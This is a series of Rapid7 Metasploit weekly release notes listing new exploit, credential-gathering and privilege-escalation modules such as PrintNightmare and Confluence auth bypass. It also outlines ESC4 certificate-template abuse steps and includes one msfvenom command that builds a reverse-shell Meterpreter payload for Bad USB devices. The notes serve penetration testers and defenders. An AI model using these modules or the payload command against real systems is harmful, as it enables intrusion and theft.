Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2024/01/12/metasploit-weekly-wrap-up-01-12-24/

New module content (1)

Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor

Author: Pasquale ‘sid’ Fiorillo
Type: Post
Pull request: #18604 contributed by siddolo
Path: windows/gather/credentials/winbox_settings

Description: This pull request introduces a new post module to extract the Mikrotik Winbox credentials, which are saved in the settings.cfg.viw file when the "Keep Password" option is selected in Winbox.

Enhancements and features (7)

• #18515 from errorxyz – This PR adds a Java target for the ManageEngine ServiceDesk Plus exploit CVE-2022-47966 using the payload mentioned in this blogpost and deletes the log file that records the error due to the exploit to make it more stealthy.
• #18672 from h00die – Fix spelling mistakes in Metasploit’s library folder.
• #18673 from h00die – Fix spelling mistakes in Metasploit’s scripts folder.
• #18674 from h00die – Fix spelling mistakes in Metasploit’s plugins folder.
• #18675 from h00die – Fix spelling mistakes in Metasploit’s tools folder.
• #18679 from h00die – Fix spelling mistakes in Metasploit’s auxiliary modules.
• #18691 from zeroSteiner – Metasploit console now requires an installed version of apktool greater than or equal to v2.9.2.

Bugs fixed (5)

• #18656 from dwelch-r7 – Enforces all modules to be loaded as part of reload_all when the defer_module_loads feature is enabled.
• #18666 from zeroSteiner – Fixes a crash when running the save command to save Metasploit’s configuration.
• #18667 from zeroSteiner – Re-adds the #sysinfo instance method for sessions.
• #18669 from sjanusz-r7 – Updates the favorites command to no longer output an empty message when a chosen module does not have custom datastore values available.
• #18690 from sjanusz-r7 – Ensures that a target’s default payload is correctly chosen when selecting a module from the search command.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.50…6.3.51
• Full diff 6.3.50…6.3.51

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/11/23/metasploit-wrapup-74/

Enhancements and features (2)

• #18548 from zeroSteiner – Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
• #18552 from adfoster-r7 – Adds support for Ruby 3.3.0-preview3.

Bugs fixed (5)

• #18448 from HynekPetrak – Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
• #18538 from adfoster-r7 – Fixes an intermittent stream closed in another thread crash when booting msfconsole.
• #18547 from adfoster-r7 – This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
• #18558 from zeroSteiner – Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
• #18564 from zeroSteiner – Fixes a module crash when running the auxiliary/server/capture/http module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.43…6.3.44
• Full diff 6.3.43…6.3.44

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/10/27/metasploit-weekly-wrap-up-33/

New module content (4)

Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control

Authors: Emir Polat and Unknown
Type: Auxiliary
Pull request: #18447 contributed by emirpolatt
Path: admin/http/atlassian_confluence_auth_bypass
AttackerKB reference: CVE-2023-22515

Description: This adds an exploit for CVE-2023-22515, which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.

VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure

Authors: Harsh Jaiswal ( <Harsh Jaiswal (@rootxharsh)>, Rahul Maini ( <Rahul Maini (@iamnoooob)>, SinSinology, and h00die
Type: Exploit
Pull request: #18460 contributed by h00die
Path: linux/ssh/vmware_vrni_known_privkey

Description: This adds a new exploit module that leverages the fact that SSH keys on VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 are not randomized on initialization. It tries all the default SSH keys until one succeeds and gains unauthorized remote access as the "support" (root) user.

Splunk "edit_user" Capability Privilege Escalation

Authors: Heyder Andrade, Mr Hack (try_to_hack) Santiago Lopez, and Redway Security <redwaysecurity.com>
Type: Exploit
Pull request: #18348 contributed by heyder
Path: multi/http/splunk_privilege_escalation_cve_2023_32707

Description: This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, that allows a low privilege user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Add a new user to the system

Author: Nick Cottrell [email protected]
Type: Post
Pull request: #18194 contributed by rad10
Path: linux/manage/adduser

Description: This adds a post module that creates a new user on the target OS. It tries to use standard tools already available on the system, but it’s also able to directly update the plaintext database files (/etc/passwd and /etc/shadow). This module requires root privileges.

Enhancements and features (4)

• #18299 from zgoldman-r7 – Improves error messages for timeouts when interacting with a Meterpreter session. Previously an unclear error was printed. Now the user is notified how to increase the timeout limit.
• #18421 from smashery – This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
• #18466 from nfsec – Updates the Docker entrypoint script to use getent instead of grep when detecting user/group details.
• #18299 from h00die – This adds a db_stats command which gives the user information about how much data is in their database/workspace.

Bugs fixed (2)

• #18400 from dwelch-r7 – This fixes an issue when searching for a Kerberos ticket and passing in the workspace. The workspace is now correctly used to query the database.
• #18403 from cdelafuente-r7 – Fixes a potential bug with modules that register files to cleanup after a session opens. Previously modules could accidentally mutate registered file names to delete, causing the intended files to be left on the remote system still.

Documentation added (1)

• #18470 from zgoldman-r7 – Adds a new Wiki page for session management, detailing how to search for sessions and killing stale sessions.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.39…6.3.40
• Full diff 6.3.39…6.3.40

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/09/08/metasploit-weekly-wrap-up-26/

New module content (4)

Roundcube TimeZone Authenticated File Disclosure

Authors: joel, stonepresto, and thomascube
Type: Auxiliary
Pull request: #18286 contributed by cudalac
Path: auxiliary/gather/roundcube_auth_file_read
AttackerKB reference: CVE-2017-16651

Description: This PR adds a module to retrieve an arbitrary file on hosts running Roundcube versions from 1.1.0 through version 1.3.2.

Elasticsearch Memory Disclosure

Authors: Eric Howard, R0NY, and h00die
Type: Auxiliary
Pull request: #18322 contributed by h00die
Path: auxiliary/scanner/http/elasticsearch_memory_disclosure
AttackerKB reference: CVE-2021-22145

Description: Adds an aux scanner module which exploits a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive) by submitting a malformed query that generates an error message containing previously used portions of a data buffer. The disclosed memory could contain sensitive information such as Elasticsearch documents or authentication details.

QueueJumper – MSMQ RCE Check

Authors: Bastian Kanbach, Haifei Li, and Wayne Low
Type: Auxiliary
Pull request: #18281 contributed by bka-dev
Path: auxiliary/scanner/msmq/cve_2023_21554_queuejumper
AttackerKB reference: CVE-2023-21554

Description: This PR adds a module that detects Windows hosts that are vulnerable to Microsoft Message Queuing Remote Code Execution aka QueueJumper.

SolarView Compact unauthenticated remote command execution vulnerability.

Author: h00die-gr3y
Type: Exploit
Pull request: #18313 contributed by h00die-gr3y
Path: exploits/linux/http/solarview_unauth_rce_cve_2023_23333
AttackerKB reference: CVE-2023-23333

Description: This PR adds a module which exploits a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.

Enhancements and features (2)

• #18179 from jvoisin – This improves the windows checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
• #18190 from jvoisin – This improves the linux checkvm post module by adding new techniques to identify the hypervisor in which the session is running.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.32…6.3.33
• Full diff 6.3.32…6.3.33

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/08/11/metasploit-weekly-wrapup-8/

New module content (1)

Metabase Setup Token RCE

Authors: Maxwell Garrett, Shubham Shah, and h00die
Type: Exploit
Pull request: #18232 contributed by h00die
Path: exploits/linux/http/metabase_setup_token_rce
AttackerKB reference: CVE-2023-38646

Description: This adds a module for an unauthenticated RCE against Metabase. Metabase versions before 0.46.6.1 contain a bug where an unauthenticated user can retrieve a setup-token. With this, they can query an API endpoint to setup a new database, then inject an H2 connection string RCE.

Enhanced Modules (1)

Modules which have either been enhanced, or renamed:

• #18264 from zeroSteiner – Updates the exploits/freebsd/http/citrix_formssso_target_rce module for CVE-2023-3519 to include two new targets, Citrix ADC (NetScaler) 12.1-65.25, and 12.1-64.17. This module now supports automatic targeting based on the Last-Modified header of the logon/fonts/citrix-fonts.css resource.

Enhancements and features (6)

• #18191 from jvoisin – This adds support for detecting whether a Metasploit session is running in a Podman container and improves detection for sessions running in Docker, LXC, and WLS containers.
• #18224 from rorymckinley – This adds the first iteration of specs for SSH Login scanner.
• #18231 from ErikWynter – This adds index selection for the modules returned via the favorites (or show favorites) command.
• #18244 from cgranleese-r7 – Adds tests to ensure the consistency of Metasploit payloads.
• #18274 from wvu – Updates CVE-2020-14871 exploits/solaris/ssh/pam_username_bof docs.

Bugs fixed (2)

• #18220 from dwelch-r7 – Adds additional error handling when loading Metasploit payloads to msfconsole’s startup process to ensure missing payloads do not crash msfconsole.
• #18260 from adfoster-r7 – This adds a fix to verify the EC2_ID module option is validated.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.28…6.3.29
• Full diff 6.3.28…6.3.29

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/06/02/metasploit-weekly-wrap-up-12/

AD CS certificate templates

Our very own Spencer McIntyre has developed a new module that allows for creating, reading, updating and deleting certificate template objects from Active Directory.

ESC4 Exploitation

These changes notably enables the exploitation of the technique identified as ESC4 whereby an attacker that has access to modify the certificate template object in LDAP can change it to set the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag in the mspki-certificate-name-flag field to enable exploitation of ESC1. Exploiting this scenario would be a three step process:

1. Use this module update a certificate template that you have rights to modify
2. Use the icpr_cert module to exploit ESC1 by specifying a privileged user in the ALT_UPN field
3. Restore the certificate template that was replaced in step 1 with the backup that was automatically created

SDDL

When the user updates the certificate template, the nTSecurityDescriptor field is overwritten with one that provides all access to all authenticated users. This means it’s critical that the template be restored when the operator is finished. A backup is created every time the template is read, but it’s not restored automatically because the actions taken once the module has completed will likely involve another module such as icpr_cert.

The existing MsDtypSecurityDescriptor class has a new .from_sddl_text method to create a new instance from Microsoft’s (relatively) human-readable Security Descriptor Definition Language. This means the SID in the ACEs can be specified by copying the included template file and changing it to whatever the user would like. They could for example set it to the SID of the current user, or the domain admins group, etc.

New module content (2)

AD CS Certificate Template Management

Authors: Lee Christensen, Oliver Lyak, Spencer McIntyre, and Will Schroeder
Type: Auxiliary
Pull request: #17965 contributed by zeroSteiner

Description: This adds an auxiliary module that can create, read, update, and delete certificate template objects from Active Directory.

Sudoedit Extra Arguments Priv Esc

Authors: Matthieu Barjole, Victor Cutillas, and h00die
Type: Exploit
Pull request: #17929 contributed by h00die
AttackerKB reference: CVE-2023-22809

Description: This adds an exploit for CVE-2023-22809, an LPE within sudoedit. The exploit currently only supports Ubuntu 22.04 and 22.10.

Enhancements and features (1)

• #17989 from cgranleese-r7 – The auxiliary/admin/kerberos/inspect_ticket and auxiliary/admin/kerberos/forge_ticket modules have been updated to visually represent the decoded binary values of the Kerberos ticket fields

Bugs fixed (4)

• #18009 from cgranleese-r7 – This PR updates the msfdb commands to no longer enable the web services as default. The web service will now be enabled with the web service flag: --msf-data-service <NAME>.
• #18010 from adfoster-r7 – Fix edgecase crash when running smb_login with Kerberos auth activated
• #18015 from distortedsignal – Deletes a dead link from the Using Metasploit page
• #18024 from zgoldman-r7 – This PR fixes an issue with credentials being normalized to lowercase inconsistently, causing collisions with uppercase data. Relevant credentials are now automatically normalized to lowercase on insert and lookup.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.17…6.3.18
• Full diff 6.3.17…6.3.18

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/01/13/metasploit-weekly-wrap-up-188/

New module content (2)

Gather Dbeaver Passwords

Author: Kali-Team
Type: Post
Pull request: #17337 contributed by cn-kali-team

Description: This adds a post exploit module that retrieves Dbeaver session data from local configuration files. It is able to extract and decrypt credentials stored in these files for any version of Dbeaver installed on Windows or Linux/Unix systems.

Gather MinIO Client Key

Author: Kali-Team
Type: Post
Pull request: #17341 contributed by cn-kali-team

Description: This adds a post module that gathers local credentials stored by the MinIO client on Windows, Linux, and MacOS.

Enhancements and features (2)

• #17427 from gwillcox-r7 – This adds YARD documentation to the LDAP libraries for developers to reference.
• #17447 from gwillcox-r7 – We now utilize ‘pry’ dependencies with support for newer Ruby versions.

Bugs fixed (3)

• #17386 from smashery – A bug has been fixed whereby the HTTP library was parsing HTTP HEAD requests like GET requests, which was causing issues due to lack of compliance to RFC9110 standards. By updating the code to be more compliant with these standards, modules such as auxiliary/scanner/http/http_header now work as expected.
• #17438 from ErikWynter – This fixes an issue in the exchange_proxylogon_collector module where it would crash if the LegacyDN was not present in the XML response.
• #17454 from prabhatjoshi321 – A bug has been fixed whereby smb_enumshares incorrectly truncated file names before storing them into loot. This has been addressed so that only the console output will contain truncated file names, and the loot files will still contain the full file names for reference.

Documentation added (1)

• #17395 from cgranleese-r7 – Adds documentation for both the JSON and MessagePack Metasploit RPC APIs – which is useful for programmatically interacting with Metasploit.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.34…6.2.35
• Full diff 6.2.34…6.2.35

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2022/11/25/metasploit-weekly-wrap-up-185/

F5 Big-IP

This week’s Metasploit release contains 2 new modules released as part of the Rapid7 F5 BIG-IP and iControl REST Vulnerabilities research article.

These discoveries were made by our very own Ron Bowes, who developed an exploit module for authenticated RCE against F5 devices running in appliance mode to achieve a Meterpreter session as the root user.

Ron Bowes has also developed an F5 Metasploit module exploiting CVE-2022-41622, a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below – which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.

For more information, see Rapid7’s blog post which detail the vulnerabilities.

DuckyScript support

Community contributor h00die contributed an enhancement to msfvenom. This adds the ducky-script-psh format to msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -f ducky-script-psh lhost=127.0.0.1 lport=444

This allows users to create payloads that are compatible with Bad USB devices such as the Flipper Zero.

New module content (3)

• F5 BIG-IP iControl Authenticated RCE via RPM Creator by Ron Bowes, which exploits CVE-2022-41800 – This adds an authenticated RCE for F5 devices that leverages the command injection flaw identified in CVE-2022-41800.
• F5 BIG-IP iControl CSRF File Write SOAP API by Ron Bowes, which exploits CVE-2022-41622 – This module exploits a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.
• ChurchInfo 1.2.13-1.3.0 Authenticated RCE by m4lwhere, which exploits CVE-2021-43258 – A new module has been added for CVE-2021-43258 which exploits a flaw whereby, when emailing users in the ChurchInfo database with attachments, the uploaded file is hosted in a web accessible location under the ChurchInfo web root before the email is sent. An authenticated attacker can abuse this to gain RCE as the www-user user.

Enhancements and features (6)

• #17145 from k0pak4 – This PR adds the ability to authenticate via hash and improves the error reporting when authentication fails.
• #17279 from h00die – This adds the ducky-script-psh format to msfvenom so it can create payloads that are compatible with Bad USB devices such as the Flipper Zero.
• #17283 from bcoles – Improves the linux/gather/enum_psk module, and adds documentation
• #17284 from bcoles – Updates modules/post/linux/gather/enum_network and modules/post/linux/gather/tor_hiddenservices to extract hostname details in a similar fashion to other modules
• #17285 from bcoles – Improves validation in linux/gather/tor_hiddenservices to ensure that the locate command is present before running the module
• #17296 from jmartin-r7 – Adds clarification to the module documentation that links to external resources are not controlled by project maintainers. These external resources may no longer exist and are subject to malicious takeover in the future. These links should be reviewed accordingly.

Bugs fixed (1)

• #17277 from adfoster-r7 – Fixes a crash within the python reverse http stager.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.27…6.2.28
• Full diff 6.2.27…6.2.28

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2022/09/02/metasploit-weekly-wrap-up-174/

ICPR Certificate Management

This week Metasploit has a new ICPR Certificate Management module from Oliver Lyak and our very own Spencer McIntyre, which can be utilized for issuing certificates via Active Directory Certificate Services. It has the capability to issue certificates which is useful in a few contexts including persistence, ESC1 and as a primitive necessary for exploiting CVE-2022-26923. Resulting in the PFX certificate file being stored to loot and is encrypted using a blank password.

ManageEngine ADAudit Plus and DataSecurity Plus Xnode enum

Another addition thanks to Erik Wynter and Sahil Dhar, that brings two new auxiliary/gather modules and docs that take advantage of default Xnode credentials (CVE-2020–11532) in order to enumerate active directory information and other sensitive data via the DataEngine Xnode server (Xnode). Because both modules rely on the same code to interact with Xnode, this change also adds a mixin at lib/msf/core/auxiliary/manageengine_xnode that is leveraged by both modules (plus by a third module that will be part of a separate PR). Both modules also come with configuration files to determine what data will be enumerated from Xnode. The PR contains even more information on the vulnerable systems and extensive notes!

New module content (5)

• ICPR Certificate Management by Oliver Lyak and Spencer McIntyre – This adds a module for issuing certificates via Active Directory Certificate Services, which is useful in a few contexts including persistence and for some specific exploits. The resulting PFX certificate file is stored to the loot and is encrypted using a blank password.

• ManageEngine ADAudit Plus Xnode Enumeration by Erik Wynter and Sahil Dhar, which exploits CVE-2020-11532 – Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, aka CVE-2020–11532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.

• ManageEngine DataSecurity Plus Xnode Enumeration by Erik Wynter and Sahil Dhar, which exploits CVE-2020-11532 – Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, a.k.a CVE-2020–11532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.

• Zyxel Firewall SUID Binary Privilege Escalation by jbaines-r7, which exploits CVE-2022-30526 – This adds an LPE exploit for Zyxel Firewalls that can allow a user to escalate themselves to root. The vulnerability is identified as CVE-2022-30526 and is due to a suid binary that allows any user to copy files with root permissions.

• CVE-2022-30190 AKA Follina by bwatters-r7 – This updates the exploit for CVE-2022-30190 (A.K.A Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer’s preview tab without needing user interaction to enable editing functionality.

Enhancements and features (4)

• #16746 from adfoster-r7 – This updates the MSSQL login scanner to catch exceptions and continue running.

• #16900 from bcoles – This adds a new #kill_process method that supports shell, PowerShell, and Meterpreter sessions on different platforms.

• #16903 from bcoles – This cleans up the enum_shares post modules and adds support for shell sessions.

• #16959 from adfoster-r7 – The time command has been updated with the --cpu and --memory profiler options to allow users to get memory and CPU usage profiles when running a command inside msfconsole.

Bugs fixed (5)

• #16750 from bojanisc – This updates the exploit/multi/http/jenkins_script_console module to use the decoder from the java.util.Base64 class in place of the now-deprecated decoder from the sun.misc.BASE64Decoder class, enabling exploitation of newer Jenkins versions.

• #16869 from bcoles – This fixes an issue in the file_remote_digestmd5() and file_remote_digestsha1() methods where read_file() would return an error message instead of the remote file contents. Additionally, the file_remote_digest* methods now support more session types, and they have a new util option that allows the user to perform the hashing on the remote host instead of downloading the remote file and performing the hashing locally.

• #16918 from rbowes-r7 – A bug has been fixed in the module for CVE-2022-30333 whereby if the server responded with a 200 OK response, the module would keep trying to trigger the payload. This would lead to multiple sessions being returned when only one was desired.

• #16920 from zeroSteiner – A typo has been fixed in _msfvenom that prevented ZSH autocompletion from working when using the --arch argument with msfvenom.

• #16955 from gwillcox-r7 – This fixes an issue in the LDAP query module that would cause issues if the user queried for a field that was populated with binary data.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from

GitHub:

• [Pull Requests 6.2.14…6.2.15][prs-landed]
• [Full diff 6.2.14…6.2.15][diff]

If you are a git user, you can clone the [Metasploit Framework repo][repo] (master branch) for the latest.

To install fresh without using git, you can use the open-source-only [Nightly Installers][nightly] or the

[binary installers][binary] (which also include the commercial edition).
[binary]: https://www.rapid7.com/products/metasploit/download.jsp
[diff]: https://github.com/rapid7/metasploit-framework/compare/6.2.14…6.2.15
[prs-landed]: https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:"2022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00"
[nightly]: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
[repo]: https://github.com/rapid7/metasploit-framework

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/

PrintNightmare

Rapid7 security researchers Christophe De La Fuente, and Spencer McIntyre, have added a new module for CVE-2021-34527, dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as NT AUTHORITY\SYSTEM.

Because Metasploit’s SMB server doesn’t support SMB3 (yet), it’s highly recommended to use an external SMB server like Samba that supports SMB3. The Metasploit module documentation details the process of generating a payload DLL and using this module to load it.

CVE-2021-34527 is being actively exploited in the wild. For more information and a full timeline, see Rapid7’s blog on PrintNightmare!

NSClient++

Great work by community contributor Yann Castel on their new NSClient++ module. This module allows an attacker with an unprivileged windows account to gain admin access on a windows system and start a shell.

For this module to work, both the web interface of NSClient++ and the ExternalScripts feature should be enabled. You must also know where the NSClient config file is as it is used to read the admin password which is stored in clear text.

New module content (2)

• Print Spooler Remote DLL Injection by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits CVE-2021-34527 – A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the SYSTEM user.

• NSClient++ 0.5.2.35 – Privilege escalation by BZYO, Yann Castel and kindredsec – This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and ExternalScriptsfeature enabled, gains a SYSTEM shell.

Enhancements and features

• #15366 from pingport80 – This updates how the msfconsole’s history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).

Bugs fixed

• #15320 from agalway-r7 – A bug has been fixed in the read_file method of lib/msf/core/post/file.rb that prevented PowerShell sessions from being able to use the read_file() method. PowerShell sessions should now be able to use this method to read files from the target system.
• #15371 from bcoles – This fixes an issue in the apport_abrt_chroot_priv_esc module where if the apport-cli binary was not in the PATH the check method would fail.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from

GitHub:

• Pull Requests 6.0.51…6.0.52
• Full diff 6.0.51…6.0.52

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the

binary installers (which also include the commercial edition).